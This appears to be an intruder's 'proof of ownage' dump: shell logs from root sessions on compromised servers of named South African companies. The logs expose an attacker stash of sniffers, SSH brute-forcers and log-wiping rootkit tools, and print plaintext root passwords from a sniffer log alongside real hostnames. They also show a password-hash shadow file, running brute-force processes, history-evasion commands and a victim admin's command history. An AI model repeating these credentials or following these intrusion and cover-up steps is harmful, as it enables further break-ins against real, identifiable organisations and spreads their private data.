-rw-r--r-- 1 root root 164485 Jun 1 2004 fernando
-rw-r--r-- 1 root root 416 Oct 21 2003 fetchmail.txt
-rw-r--r-- 1 root root 5372411 Jun 15 2004 fsav-wks-4-52-2481.tgz
-rwxr-xr-x 1 1360 users 5336184 Nov 26 2003 fsav-wks-4.52.2481*
-rw-r--r-- 1 root root 46 Apr 9 2003 get
-rw-r--r-- 1 root root 12886 Aug 22 2004 histo.tgz
drwxr-xr-x 2 root root 48 Jul 28 2003 in/
-rwxr-xr-x 1 516 516 18792 Dec 20 2002 install.sh*
-rw-r--r-- 1 1360 users 6247 Nov 26 2003 installation.txt
-rw------- 1 root root 1019 Jun 26 2004 irenecountrylodge.co.za
drwxr-xr-x 5 root root 144 Sep 8 2004 john-1.6/
-rw-r--r-- 1 root root 497341 Jun 18 2004 john-1.6.tar.gz
-rw-r--r-- 1 root root 216846 Oct 15 2004 keep
-rwxr-xr-x 1 root root 1518 Sep 1 2004 mail*
drwxr-xr-x 2 root root 184 Aug 6 2003 maillog/
-rw-r--r-- 1 root root 16195 Sep 10 2004 mailq
-rw-r--r-- 1 root root 68839 Dec 2 2004 mails.lafarge
drwxr-xr-x 2 1360 users 216 Nov 26 2003 manual-pages-html/
drwxr-xr-x 2 1360 users 200 Nov 26 2003 manual-pages-txt/
-rw------- 1 root root 290824 Jun 13 09:58 mbox
-rwxr-xr-x 1 root root 252 Sep 19 2003 mqueue*
-rw-r----- 1 root root 280342788 Dec 9 2004 nestlife.brenda.bak
-rw-r--r-- 1 root root 58943 Mar 26 2003 nfmc.log
-rw-r--r-- 1 root root 169 Dec 20 21:50 password
-rw-rw-r-- 1 516 516 15040 Dec 20 2002 readme.txt
-rw-r--r-- 1 root root 1216 Mar 13 2003 relay
-rw-r--r-- 1 1360 users 25063 Nov 28 2003 release-notes.txt
-rw-r--r-- 1 root root 19699 Sep 1 2004 report
-rw-r--r-- 1 root root 3339 Sep 6 2004 report.dean
-rwxr-xr-x 1 516 516 2393 Dec 20 2002 resend.sh*
-rwxr-xr-x 1 516 516 1659 Dec 20 2002 restore.sh*
-rw-r--r-- 1 root root 13594 Dec 5 2003 rrm
-rw-r--r-- 1 root root 94280 Jun 10 2004 save
-rw-r--r-- 1 root root 10396 Mar 13 2003 sendmail.8.12.security.cr.patch
-rw-r----- 1 root root 628 Sep 15 2003 sendmail.st
-rwxr-xr-x 1 root root 197 Dec 2 2004 test*
drwx------ 2 root root 80 Jun 14 01:20 tmp/
-rw-r--r-- 1 root root 339 Sep 10 2003 todel
drwxr-xr-x 3 root root 72 Sep 4 2004 usr/
drwxr-xr-x 3 root root 72 Aug 22 2004 var/
-rw-r--r-- 1 root root 7572 Sep 14 2003 var.trz
-rw-r--r-- 1 root root 11829 Jun 10 2004 wondershaper-1.0.tar.gz
drwxr-xr-x 2 1000 users 2072 Sep 10 2004 xamime-LINUX/
[root@plet root]# ls
BitDefender-sendmail-1.5.5-2.linux-gcc3x.i586.tar.run*
Creport
Desktop/
Documents/
Mail/
Sreport
XAM-BE-33-29672-LINUX-glibc23-sm11.tar.gz
XAM-BE-33-31609-LINUX-glibc23-sm11.tar.gz
XAM-BE-33-31642-LINUX-glibc22-sm11.tar.gz
XAM-LEVEL3-33-33946-LINUX-glibc23-sm11.tar.gz
XAM-LEVEL3-33-34116-LINUX-glibc23-sm11.tar.gz
aliases.frogav.co.za*
altermime-0.3.6/
altermime-0.3.6.tar.gz
apg-2.2.3/
apg-2.2.3-1mdk.i586.rpm
apg-2.2.3.tar.gz
cleanxmime*
core.13099
core.13184
core.13191
core.18972
csav-4.80.7-shared.i386.rpm
dead.letter
doc_linux.zip
domainlist
drakx/
fernando
fetchmail.txt
fsav-wks-4-52-2481.tgz
fsav-wks-4.52.2481*
get
histo.tgz
in/
install.sh*
installation.txt
irenecountrylodge.co.za
john-1.6/
john-1.6.tar.gz
keep
mail*
maillog/
mailq
mails.lafarge
manual-pages-html/
manual-pages-txt/
mbox
mqueue*
nestlife.brenda.bak
nfmc.log
password
readme.txt
relay
release-notes.txt
report
report.dean
resend.sh*
restore.sh*
rrm
save
sendmail.8.12.security.cr.patch
sendmail.st
test*
tmp/
todel
usr/
var/
var.trz
wondershaper-1.0.tar.gz
xamime-LINUX/
You have new mail in /var/spool/mail/root
[root@plet root]# cd .ssh
[root@plet .ssh]# cat known_hosts
[root@plet .ssh]# uname -a ;id;w
Linux plet.compumail.co.za 2.4.19-16mdksmp #1 SMP Fri Sep 20 16:08:37 CEST 2002 i686
unknown unknown GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
1:29am up 14 days, 17:07, 0 users, load average: 0.21, 0.30, 0.38
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
[root@plet .ssh]# cd /tmp/
[root@plet tmp]# ls -la
total 14
drwxrwxrwt 5 root root 360 Jun 14 01:28 ./
drwxr-xr-x 21 root adm 880 May 30 08:20 ../
d--S--S--T 18 root root 1416 Jun 14 01:00 .../
-rw-rw-rw- 1 ratana_g ratana_g 4 Jun 13 15:00 .900.f5a648
drwxrwxrwt 2 xfs xfs 72 Sep 12 2003 .font-unix/
srw------- 1 root root 0 May 22 10:14 .fsav-0=
srw------- 1 root root 0 Jun 14 01:28 .fsav-0-sa=
-rw-r--r-- 1 root root 0 Jun 13 04:10 authfail.log.unsort
-rw-r--r-- 1 root root 0 Jun 13 04:10 denied.log.unsort
-rw-r--r-- 1 root root 554 Jun 14 00:58 ls
-rw-r--r-- 1 root root 0 Jun 13 04:10 sarg.log.unsort
drwx------ 2 root root 80 Feb 27 2003 ssh-XXE002K6/
[root@plet tmp]# cd ...
[root@plet ...]# ls -la
total 159052
d--S--S--T 18 root root 1416 Jun 14 01:00 ./
drwxrwxrwt 5 root root 360 Jun 14 01:30 ../
-rw-r--r-- 1 root root 21788442 Jun 14 01:30 .sniff
-rw-r--r-- 1 root root 121983894 Jan 1 18:25 .sniff.old
-rw-r--r-- 1 root root 6178477 May 20 08:28 .sniff.old2
drwxr-xr-x 12 dlv_bern 1038 1200 Apr 23 20:36 BitchX/
drwxr-sr-x 2 root root 120 Jun 8 04:33 afp/
drwxrwxrwx 8 3232 ntools 928 Jan 14 06:35 cfengine-2.0.7/
-rw-r--r-- 1 root root 1190033 May 15 2003 cfengine-2.0.7.tar.gz
drwxr-sr-x 2 root root 96 Jun 8 18:12 cimap/
drwxr-xr-x 10 1001 wheel 864 Jun 11 15:54 h4ckwebdav/
-rw-r--r-- 1 root root 405818 Jun 11 15:51 h4ckwebdav.tar.gz
-rwx------ 1 root root 12014 Sep 14 2004 hide*
drwxr-sr-x 2 root root 152 Jun 6 17:31 imap/
-rw-r--r-- 1 root root 6550 Apr 23 20:32 index.html
-rw-r--r-- 1 root root 2532476 Mar 27 2004 ircii-pana-1.1-final.tar.gz
-rw-r--r-- 1 root root 1153560 Dec 11 2003 irssi-0.8.9.tar.gz
drwxr-sr-x 5 root root 144 May 12 23:33 john-1.6/
-rw-r--r-- 1 root root 497341 Sep 18 1999 john-1.6.tar.gz
-rw-r--r-- 1 root root 0 Jun 13 05:41 mail.hm
drwxrwxrwx 32 1000 1000 1416 May 28 08:05 mailutils-0.6/
-rw-r--r-- 1 root root 2837017 Dec 23 20:19 mailutils-0.6.tar.gz
drwxrwxrwx 4 500 frog_rud 1824 Jun 8 15:42 nano-1.2.5/
-rw-r--r-- 1 root root 911938 May 16 06:06 nano-1.2.5.tar.gz
-rw-r--r-- 1 root root 1846196 Apr 24 08:58 nmap-3.81.tgz
-rw-r--r-- 1 root root 2105 Dec 11 2004 nmap.log
drwxrwxr-x 7 500 frog_rud 10768 Jun 8 15:56 openssh-3.4p1/
-rw-r--r-- 1 root root 837668 Sep 17 2002 openssh-3.4p1.tar.gz
-rw-r--r-- 1 root root 312224 Jun 24 2004 psyBNC2.3.1.tar.gz
drwxrwxr-x 11 root root 728 Mar 9 08:58 psybnc/
drwxr-sr-x 2 root root 176 May 27 21:41 rlogin/
-rw------- 1 1010 dlv_bern 263 Feb 18 2000 rootkitutil.h
drwxr-xr-x 3 root wheel 216 Jan 2 07:58 shoutcast-1-9-4-linux-glibc6/
-rw-r--r-- 1 root root 152616 Mar 18 2004 shoutcast-1-9-4-linux-glibc6.tar.gz
drwxr-xr-x 2 root root 632 May 11 23:10 shroud-1.30/
-rw-r--r-- 1 root root 9248 Nov 3 2002 shroud-1.30.tgz
-rwxr-xr-x 1 root root 20416 May 13 00:43 sol*
-rw-r--r-- 1 root root 12529 May 13 00:42 sol.c
drwxr-sr-x 2 root root 256 Jun 12 03:37 sshbrute/
-rw-r--r-- 1 root root 2402 Jun 10 06:21 ssheist-1.log
drwxr-sr-x 3 root root 656 May 12 04:03 synscan/
-rw-r--r-- 1 root root 53939 Mar 22 2002 synscan1.6.tar.gz
-rwxr-xr-x 1 root root 19860 May 11 23:13 vanish2*
-rw------- 1 1010 dlv_bern 8525 Feb 18 2000 vanish2.c
-rw-r--r-- 1 root root 3256 Feb 18 2000 vanish2.tgz
[root@plet ...]# cat nmap.log
[root@plet ...]# cat ssheist-1.log
===========================================================================
Username: root Password: n3tw0rk1ng Host: lin02.lanlink.co.za
===========================================================================
===========================================================================
Username: root Password: `1q2wsxde Host: lin02.lanlink.co.za
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: localhost
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: sodwana.compumail.co.za
===========================================================================
===========================================================================
Username: root Password: coahtr Host: histologic.no-ip.info
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za
===========================================================================
===========================================================================
Username: test Password: test Host: 129.7.238.59
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za
===========================================================================
===========================================================================
Username: root Password: n3tw0rk1ng Host: knysna.compumail.co.za
===========================================================================
[root@plet ...]# cd john-1.6/
[root@plet john-1.6]# cd run
[root@plet run]# ls
128.8.140.206.shadow john.ini restore
all.chr john.pot unafs@
alpha.chr lanman.chr unique@
digits.chr mailer* unshadow@
john* password.lst
[root@plet run]# cat john.pot
[root@plet run]# cat 128.8.140.206.shadow
root:1/CYJWaWszA5M:6445::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
listen:*LK*:::::::
nobody:NP:6445::::::
noaccess:NP:6445::::::
nobody4:NP:6445::::::
ravi:3uX7r/uT9F/7I:11404::::::
patrick:eM61oULnSalhY:12175::::::
[root@plet run]#
[root@plet run]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1364 500 ? S May30 0:53 init [3]
root 2 0.0 0.0 0 0 ? SW May30 0:00 [keventd]
root 3 0.0 0.0 0 0 ? SWN May30 0:02 [ksoftirqd_CPU0]
root 4 0.0 0.0 0 0 ? SWN May30 0:02 [ksoftirqd_CPU1]
root 5 0.0 0.0 0 0 ? SW May30 0:19 [kswapd]
root 6 0.0 0.0 0 0 ? SW May30 0:00 [bdflush]
root 7 0.0 0.0 0 0 ? SW May30 7:37 [kupdated]
root 8 0.0 0.0 0 0 ? SW< May30 0:00 [mdrecoveryd]
root 12 0.0 0.0 0 0 ? SW May30 0:00 [scsi_eh_0]
root 13 0.0 0.0 0 0 ? SW May30 0:00 [scsi_eh_1]
root 17 0.0 0.0 0 0 ? SW May30 0:01 [kreiserfsd]
root 133 0.0 0.1 2040 1252 ? S May30 0:02 devfsd /dev
root 235 0.0 0.0 0 0 ? SW May30 0:00 [khubd]
root 965 0.0 0.0 1444 584 ? S May30 20:26 syslogd -m 0
root 973 0.0 0.1 2120 1204 ? S May30 0:04 klogd -2
daemon 2447 0.0 0.0 1392 500 ? S May30 0:00 /usr/sbin/atd
named 2464 0.0 1.1 21584 10664 ? S May30 0:00 named -u named
named 2469 0.0 1.1 21584 10664 ? S May30 0:12 named -u named
named 2470 0.0 1.1 21584 10664 ? S May30 14:31 named -u named
named 2471 0.0 1.1 21584 10664 ? S May30 14:29 named -u named
named 2472 0.0 1.1 21584 10664 ? S May30 0:37 named -u named
named 2473 0.0 1.1 21584 10664 ? S May30 6:00 named -u named
root 2490 0.0 0.1 1784 1776 ? SL May30 0:50 ntpd -A
root 2532 0.0 0.0 2028 880 ? S May30 3:22 xinetd -stayalive
root 2608 0.0 0.2 4860 2024 ? S May30 3:29 sendmail: accepti
mail 2623 0.0 0.1 4852 1480 ? S May30 0:00 sendmail: Queue r
root 2776 0.0 0.2 7760 2472 ? S May30 0:23 httpd-perl -f /et
apache 2780 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et
apache 2782 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et
apache 2783 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et
apache 2785 0.0 0.1 7856 1532 ? S May30 0:00 httpd-perl -f /et
root 2793 0.0 0.4 12524 4140 ? S May30 0:27 httpd -DPERLPROXI
root 2880 0.0 0.0 1568 672 ? S May30 0:03 crond
root 2948 0.0 0.0 1332 408 vc/2 S May30 0:00 /sbin/mingetty tt
root 2949 0.0 0.0 1332 408 vc/3 S May30 0:00 /sbin/mingetty tt
root 2950 0.0 0.0 1332 408 vc/4 S May30 0:00 /sbin/mingetty tt
root 2951 0.0 0.0 1332 408 vc/5 S May30 0:00 /sbin/mingetty tt
root 2952 0.0 0.0 1332 408 vc/6 S May30 0:00 /sbin/mingetty tt
msp_info 5845 0.0 0.2 3624 2072 ? S May30 6:00 ./Contagious Kv1c
root 9155 0.0 0.2 5296 2584 ? S May30 0:00 sendmail: j4U6ftV
root 7600 0.0 0.1 3732 1496 ? S Jun01 0:00 /usr/bin/perl /us
apache 7601 0.0 0.2 12828 2620 ? S Jun01 0:00 httpd -DPERLPROXI
apache 7602 0.0 0.2 12836 2608 ? S Jun01 0:00 httpd -DPERLPROXI
apache 7603 0.0 0.2 12828 2616 ? S Jun01 0:00 httpd -DPERLPROXI
apache 7604 0.0 0.2 12820 2608 ? S Jun01 0:00 httpd -DPERLPROXI
apache 12589 0.0 0.2 12720 2508 ? S Jun01 0:00 httpd -DPERLPROXI
root 1260 0.0 0.1 2328 1072 ? S Jun02 0:00 login -- root
apache 4834 0.0 0.2 12824 2612 ? S Jun02 0:00 httpd -DPERLPROXI
root 14207 0.0 0.0 2632 764 ? S Jun03 0:12 ./sshbrute -brute
root 17152 0.0 0.1 2712 1632 vc/1 S Jun08 0:00 -bash
apache 14863 0.0 0.4 12680 4468 ? S Jun09 0:00 httpd -DPERLPROXI
root 24042 0.0 0.2 5216 2508 ? S Jun10 0:00 sendmail: j5AFH2V
root 25803 0.2 0.0 1648 728 ? S Jun10 10:41 xfsd
root 27645 0.0 0.0 2632 760 ? S Jun10 0:04 ./sshbrute2 -brut
root 27695 0.0 0.0 2632 760 ? S Jun10 0:01 ./sshbrute2 -brut
root 27805 0.0 0.0 2632 764 ? S Jun10 0:00 ./sshbrute -brute
root 26355 0.0 0.0 2632 764 ? S Jun11 0:00 ./sshbrute -brute
root 32265 0.0 0.0 2632 764 ? S Jun12 0:00 ./sshbrute -brute
root 32275 0.0 0.0 2632 760 ? S Jun12 0:00 ./sshbrute2 -brut
root 21234 0.0 0.1 2920 1288 ? S Jun13 0:03 /usr/sbin/sshd
root 14019 0.0 0.1 5604 1556 ? S 00:41 0:00 sshd: root@notty
root 14389 0.0 0.0 1576 696 ? S 00:45 0:00 CROND
root 14391 0.0 0.3 6052 3224 ? S 00:45 0:00 sendmail: ./j5DMj
root 15324 0.0 0.2 5216 2496 ? S 00:57 0:00 sendmail: j5DMvsV
root 17286 0.0 0.1 5608 1576 ? S 01:17 0:00 sshd: root@notty
root 17978 0.0 0.1 5604 1564 ? S 01:25 0:00 sshd: root@pts/4
root 18000 0.0 0.1 2696 1620 pts/4 S 01:25 0:00 -bash
root 18328 0.5 0.1 2800 1268 ? S 01:29 0:01 ./sshbrute -brute
root 18369 0.3 0.1 2796 1296 ? S 01:30 0:00 ./sshbrute -brute
root 18397 0.5 0.1 2796 1296 ? S 01:31 0:00 ./sshbrute -brute
root 18433 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut
root 18436 0.5 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute -brute
root 18459 0.2 0.1 2796 1296 ? S 01:32 0:00 ./sshbrute2 -brut
root 18470 0.2 0.1 2784 1120 ? S 01:33 0:00 ./sshbrute2 -brut
root 18471 0.0 0.1 3172 1320 pts/4 R 01:33 0:00 ps aux
[root@plet run]# logout
----------------------------------
skew @ histologic: nothing much here but more pr00f skew == tal0n.
----------------------------------
login as: root
root@histologic.no-ip.info's password:
Last login: Tue Jun 14 04:51:51 2005 from adsl-10-197-59.mia.bellsouth.net
[root@histofw root]# unset HISTFILE
[root@histofw root]# w
07:01:49 up 200 days, 17:40, 0 users, load average: 0.01, 0.02, 0.00
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
[root@histofw root]# ls -al
total 408
drwx------ 20 root root 4096 Jun 14 05:15 ./
drwxr-xr-x 18 root adm 4096 Nov 25 2004 ../
-rw------- 1 root root 16160 Jun 12 14:42 .bash_history
-rw-r--r-- 1 root root 24 Dec 2 2002 .bash_logout
-rw-r--r-- 1 root root 106 Dec 2 2002 .bash_profile
-rw-r--r-- 1 root root 226 Dec 2 2002 .bashrc
-rw-r--r-- 1 root root 233 Dec 2 2002 .cshrc
-rw-r--r-- 1 root root 14 May 12 2004 .desktop
drwx------ 3 root root 4096 May 12 2004 Desktop/
drwxr-xr-x 2 root root 4096 May 12 2004 Documents/
drwx------ 2 root root 4096 May 12 2004 drakx/
-rw-r--r-- 1 root root 355 May 12 2004 .fonts.cache-1
drwx------ 3 root root 4096 May 12 2004 .gconf/
drwx------ 2 root root 4096 May 12 2004 .gconfd/
drwx------ 2 root root 4096 May 12 2004 .gnome/
drwx------ 3 root root 4096 May 12 2004 .gnome2/
drwx------ 2 root root 4096 May 12 2004 .gnome2_private/
-rw-r--r-- 1 root root 119 May 12 2004 .gtkrc
-rw-r--r-- 1 root root 123 May 12 2004 .gtkrc-2.0
-rw------- 1 root root 0 May 13 2004 .ICEauthority
drwxr-xr-x 2 root root 4096 May 12 2004 .icewm/
drwx------ 2 root root 4096 Jun 12 04:00 .irssi/
drwxr-xr-x 4 root root 4096 May 13 2004 .kde/
drwxr-xr-x 2 root root 4096 Jun 2 2004 .mc/
drwxr-xr-x 2 root root 4096 May 12 2004 .mcop/
drwxrwxr-x 3 500 500 4096 Jun 4 2004 noip-2.1.1/
-rw-r--r-- 1 root root 71210 Jun 4 2004 noip-duc-linux.tar.gz
drwxr-xr-x 2 root root 4096 May 12 2004 .qt/
-rw------- 1 root root 1024 May 13 2004 .rnd
-rw-r--r-- 1 root root 126 May 13 2004 .rpmdrake
drwxr-xr-x 5 root root 4096 May 13 2004 sarg-1.4.1/
-rw-r--r-- 1 root root 2034 May 13 2004 sarg-1.4.1-index.sort.patch
-rw-r--r-- 1 root root 125589 May 13 2004 sarg-1.4.1.tar.gz
-rw-r--r-- 1 root root 329 May 13 2004 sarg_cron.txt
-rw-r--r-- 1 root root 177 May 13 2004 sarg_daily.txt
-rw-r--r-- 1 root root 612 May 13 2004 sarg_monthly.htm
-rw-r--r-- 1 root root 292 May 13 2004 sarg_monthly.txt
-rw-r--r-- 1 root root 8368 May 13 2004 sarg.reports.txt
-rw-r--r-- 1 root root 435 May 13 2004 sarg_weekly.txt
drwx------ 2 root root 4096 May 12 2004 .ssh/
-rw-r--r-- 1 root root 189 Dec 2 2002 .tcshrc
drwx------ 4 root root 4096 Jun 14 05:14 tmp/
-rw------- 1 root root 5624 Jun 14 05:15 .viminfo
-rw-r--r-- 1 root root 3750 Dec 2 2002 .vimrc
-rw-r--r-- 1 root root 6 May 12 2004 .wmrc
-rw------- 1 root root 53 May 13 2004 .Xauthority
-rw-r--r-- 1 root root 1479 Dec 2 2002 .Xdefaults
-rw------- 1 root root 1478 May 13 2004 .xsession-errors
[root@histofw root]# history
5 cd /etc/squid/
6 ll
7 vi squid.conf
8 vi msntauth.conf
9 dig server1
10 cd /etc/hosts
11 cd /etc
12 vi hosta
13 vi hosts
14 dig server1
15 vi hosts
16 /usr/lib/squid/msnt_auth
17 dmesg
18 scp root@knysna.compumail.co.za:/usr/sbin/bwm /usr/sbin/
19 scp root@knysna.compumail.co.za:/usr/bin/bwm /usr/sbin/
20 scp root@knysna.compumail.co.za:/usr/bin/bwm /usr/bin/
21 ll
22 dmesg -c
23 vi msntauth.conf
24 /usr/lib/squid/msnt_auth
25 ping 192.168.0.1
26 ping server1
27 cd squid/
28 vi msntauth.conf
29 /usr/lib/squid/msnt_auth
30 locate msnt_auth
31 cd /usr/lib/squid/
32 ll
33 cd et
34 cd ..
35 ll
36 cd squid/
37 ll
38 file msnt_auth
39 view msnt_auth
40 vi /etc/squid/msntauth.conf
41 pwd
42 ./msnt_auth
43 ./msnt_auth -d
44 /etc/init.d/squid restart
45 cd /etc/squid/
46 vi squid.conf
47 squid check
48 squid -k check
49 squid -k restart
50 /etc/init.d/squid restart
51 tail -f /var/log/squid/access.log
52 ll
53 cd /
54 cd /root/
55 ll
56 tar zcvf sarg-1.4.1.tar.gz
57 tar zxvf sarg-1.4.1.tar.gz
58 cd sarg
59 cd sarg-1.4.1
60 ll
61 ll ..
62 cd ..
63 tar zxvf sarg-1.4.1-index.sort.patch.gz
64 gunzip sarg-1.4.1-index.sort.patch.gz
65 ll
66 cd sarg-1.4.1
67 patch -?
68 patch --help
69 cd ..
70 ll
71 view sarg-1.4.1-index.sort.patch
72 cd sarg
73 cd sarg-1.4.1
74 patch -c0 < ../sarg-1.4.1-index.sort.patch
75 man patch
76 patch -p0 < ../sarg-1.4.1-index.sort.patch
77 ll
78 ./configure
79 make
80 make install
81 vi Makefile
82 locate man
83 locate man | more
84 vi Makefile
85 locate man | more
86 vi Makefile
87 make install
88 cd /etc/shorewall/
89 vi rules
90 shorewall restart
91 vi rules
92 shorewall restart
93 cat /var/named/office.histologic.co.za.hosts
94 dig server1
95 dig server1.office.histologic.co.za
96 dig server2.office.histologic.co.za
97 vi /etc/nsswitch.conf
98 vi /etc/resolv.conf
99 dig server2.office.histologic.co.za
100 dig www.google.com
101 exit
102 ifconfig
103 ping 196.25.1.1
104 /etc/init.d/iplog status
105 /etc/init.d/iplog restart
106 /etc/init.d/squid status
107 /etc/init.d/squid stop
108 squid -z
109 /etc/init.d/squid start
110 /etc/init.d/squid status
111 tcpdump -i eth1
112 tcpdump -vi eth1
113 tcpdump -vni eth1
114 host 196.37.145.26
115 ssh 196.7.8.54
116 dig -x 165.165.160.224 @196.25.1.1
117 dmesg
118 dmesg -c
119 netstat -rn
120 vi /etc/sysconfig/network
121 /etc/init.d/network restart
122 netstat -rn
123 dmesg -c
124 tcpdump -i eth0 icmp
125 tcpdump -i eth1 icmp
126 vi /etc/shorewall/
127 netstat -rn
128 tcpdump -i eth1 icmp
129 cd /etc/shorewall/
130 vi rules
131 shorewall restart
132 dmesg -c
133 dmesg
134 vi /etc/shorewall/rules
135 tcpdump -i eth0 src 192.168.0.10 and dst 192.168.0.1
136 vi /etc/iplog.conf
137 chkconfig --add iplog
138 /etc/init.d/iplog start
139 tail -f /var/log/iplog
140 dig -x 165.165.179.224
141 dig -x 165.165.179.224 @196.25.1.1
142 dig -x 165.165.179.224 @196.168.10.1
143 dig -x 165.165.179.224 @196.168.1.10
144 tail -f /var/log/iplog
145 cd /etc/shorewall/
146 vi rules
147 vi policy
148 shorewall restart
149 exit
150 vi /usr/sbin/sarg.reports
151 exit
152 /etc/init.d/squid status
153 ping 196.25.1.1
154 dig www.google.com
155 dmesg
156 dmesg -c
157 dig www.google.com
158 dmesg -c
159 ping 196.25.1.1
160 ifconfig
161 ping 192.168.1.10
162 dmesg -c
163 vi /etc/shorewall/rules
164 dmesg
165 dmesg -c
166 vi /etc/shorewall/rules
167 shorewall restart
168 vi /etc/shorewall/rules
169 cd /
170 sarg.reports
171 crontab -e -u root
172 cd /var/www/
173 ll
174 rm -rf www/
175 cd html/squid/
176 ll
177 ll Daily/
178 df -g
179 df -h
180 exit
181 bwm
182 dmesg -c
183 exit
184 /etc/init.d/fwlogwatch status
185 vi /etc/fwlogwatch.config
186 /etc/init.d/fwlogwatch stop
187 fwlogwatch
188 /etc/init.d/fwlogwatch status
189 /etc/init.d/fwlogwatch
190 /etc/init.d/fwlogwatch restart
191 killall fwlogwatch
192 /etc/init.d/fwlogwatch restart
193 vi /etc/fwlogwatch.config
194 /etc/init.d/fwlogwatch start
195 /etc/init.d/fwlogwatch restart
196 /etc/init.d/fwlogwatch stop
197 tail /var/log/messages
198 vi /etc/fwlogwatch.config
199 /etc/init.d/fwlogwatch restart
200 fwlogwatch
201 /etc/init.d/fwlogwatch restart
202 exit
203 cd /var/www/html/
204 ll fwlog.html
205 vi /etc/fwlogwatch.config
206 tail -f /var/log/messages
207 vi /etc/fwlogwatch.config
208 exit
209 /etc/init.d/adsl restart
210 dir
211 /etc/init.d/adsl
212 ifconfig
213 netstat -rn
214 ping 198.168.1.10
215 etc/intit.d/network restart
216 /etc/init.d/network restart
217 ping 192.168.1.10
218 exit
219 /etc/init.d/adsl restart
220 exit
221 ping 196.15.249.203
222 shorewall status
223 /etc/init.d/squid status
224 /etc/init.d/squid stop
225 /etc/init.d/squid start
226 cledar
227 clea
228 clear
229 cd /etc/squid/
230 ls
231 vi msntauth.conf
232 cd /home/
233 ls
234 cd /etc/squid/
235 vi squid.conf
236 cd /usr/lib/squid/
237 ls
238 vi msnt_auth
239 ls
240 /etc/init.d/squid stop
241 ls
242 vi msnt_auth
243 tail -f /var/log/messages
244 route
245 ping 192.168.1.10
246 /etc/init.d/squid start
247 tail -f /var/log/messages
248 poweroff
249 dmesg
250 clear
251 top
252 dmesg
253 clear
254 /etc/init.d/squid status
255 shorewall status
256 dmes
257 dmesg
258 exit
259 bwm
260 cd /etc/squid/
261 ls
262 locate
263 locate access.log
264 cd /var/log/squid
265 ls
266 ls -l
267 bwm
268 ls
269 mv access.log access.log.0206
270 vi access.log
271 ls
272 vi access.log
273 ls
274 vi access.log
275 ls
276 mc
277 mv cache.log cache.log.0206
278 vi cache.log
279 ls
280 mc
281 ls
282 bwm
283 bwm
284 ifconfig
285 tcpdump -ni eth1
286 /etc/init.d/squid stop
287 ls
288 /etc/init.d/squid start
289 /etc/init.d/squid status
290 tail -f /var/log/messages
291 netconf
292 drakconnect
293 /etc/init.d/named status
294 ifconfig
295 drakconnect
296 ifconfig
297 /etc/init.d/network stop
298 ls
299 ping www.mweb.co.za
300 ping knysna.compumail.co.za
301 ipconfig
302 ifconfig
303 ping 192.168.1.2
304 ping 192.168.1.10
305 cd /etc/
306 http://
307 ls
308 vi resolv.conf
309 /etc/init.d/named stop
310 /etc/init.d/named start
311 exit
312 ping plet.compumail.co.za
313 tcpdump -ni eth0
314 tcpdump -ni eth1
315 tcpdump -niv eth1
316 tcpdump -v eth1
317 tcpdump -vi eth1
318 exit
319 ping www.mweb.co.za
320 dmesg -c
321 clear
322 dmesg -c
323 dmesg
324 clear
325 dmesg
326 cd /etc/shorewall/
327 vi rules
328 /etc/init.d/squid stop
329 dmesg
330 dmesg -c
331 clear
332 dmesg -c
333 dmesg
334 clear
335 dmesg
336 tcpdump -ni eth1
337 bwm
338 clear
339 dmesg
340 /etc/init.d/squid start
341 tail -f /var/log/messages
342 vi rules
343 shorewall check
344 shorewall restart
345 exit
346 cd /etc/shorewall/
347 vi rules
348 shorewall check
349 shorewall restart
350 ping www.mweb.co.za
351 ping knysna.compumail.co.za
352 ping www.saix.net
353 exit
354 ssh knysna.compumail.co.za
355 cd /etc/shorewall/
356 cat rules
357 dmesg
358 clear
359 dmesg
360 ping pop.worldonline.co.za
361 cd /etc/
362 vi services
363 vi shorewall/rules
364 dmesg
365 bwm
366 dmesg
367 cd /etc/shorewall/
368 exit
369 bwm
370 dmesg
371 dmesg -c
372 cd /var/log/messages
373 cd /var/log/
374 tail messages
375 tail syslog
376 tail squid/access.log
377 vi /etc/resolv.conf
378 ifconfig
379 vi /etc/resolv.conf
380 dig www.google.com
381 dig www.lanlink.co.za
382 ifconfig
383 ping 196.25.1.1
384 ping
385 dmesg
386 vi /etc/shorewall/rules
387 vi /etc/shorewall/interfaces
388 ifconfig
389 ping
390 dmesg
391 nmap -sP 192.168.1.0/24
392 ping 192.168.1.2
393 netstat -rn
394 ping 192.168.1.10
395 dmesg
396 vi /etc/shorewall/masq
397 ifconfig
398 vi /etc/shorewall/masq
399 shorewall restart
400 vi /etc/shorewall/masq
401 vi /etc/shorewall/rules
402 shorewall restart
403 ifconfig
404 dig thatcher.no-ip.info
405 vi /etc/shorewall/rules
406 ssh 196.15.249.203
407 dmesg
408 ifconfig
409 tcpdump -i eth0
410 tcpdump -i eth0 not tcp port 22
411 tcpdump -vvi eth0 not tcp port 22
412 tcpdump -vi eth0 not tcp port 22
413 tcpdump -vi eth0 not tcp port 22 and not tcp port 110
414 tcpdump -i eth0 not tcp port 22 and not tcp port 110
415 tcpdump -ni eth0 not tcp port 22 and not tcp port 110
416 tcpdump -ni eth1 not tcp port 22 and not tcp port 110
417 tcpdump -ni eth1 dst 196.22.164.106
418 tcpdump -ni eth1 not tcp port 22 and not tcp port 110
419 dmesg -c
420 vi /etc/shorewall/rules
421 shorewall restart
422 dmesg -c
423 vi /etc/shorewall/rules
424 shorewall restart
425 dmesg -c
426 exit
